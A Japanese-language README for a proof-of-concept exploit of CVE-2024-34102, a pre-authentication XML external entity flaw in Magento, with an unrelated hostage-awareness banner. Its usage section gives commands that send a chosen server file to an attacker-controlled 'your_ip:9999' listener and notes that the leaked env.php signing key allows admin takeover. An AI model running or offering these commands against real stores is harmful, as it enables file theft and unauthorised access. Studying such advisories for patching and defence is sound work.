
Magentoにおける重大なXMLエンティティインジェクション脆弱性のPoCデモ
私たちは、テロ組織ハマスによって人質に取られたすべての市民の安全な帰還を求めます。すべての人質が解放され、無事に帰宅するまで私たちは休みません。あなたも彼らを家に連れ戻す手助けができます。 https://stories.bringthemhomenow.net/
このリポジトリには、Magento の重大な XML エンティティインジェクションの脆弱性(CVE-2024-34102)に対する概念実証(PoC)エクスプロイトが含まれています。この脆弱性により、機密ファイルの外部への流出が可能となり、その結果、Magento の管理機能への不正アクセスに悪用される可能性があります。このエクスプロイトは教育目的であり、責任を持って使用する必要があります。
Magento は世界的に最も人気のある eコマースソリューションの一つです。2024年6月に、CVE-2024-34102 として識別される、認証前の重大な XML エンティティインジェクションの問題が発見されました。この脆弱性は、Magento の app/etc/env.php ファイルの流出など、深刻な結果を引き起こす可能性があります。このファイルには JWT の署名に使用される暗号鍵が含まれています。
requests ライブラリ(pip install requests)リポジトリをクローンします:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
必要な引数を指定してスクリプトを実行します:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: ターゲットの Magento インスタンスの URL。--target-file: ターゲットサーバー上で外部に流出させるファイルパス。--exfil-url: 流出データを受信する URL。python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999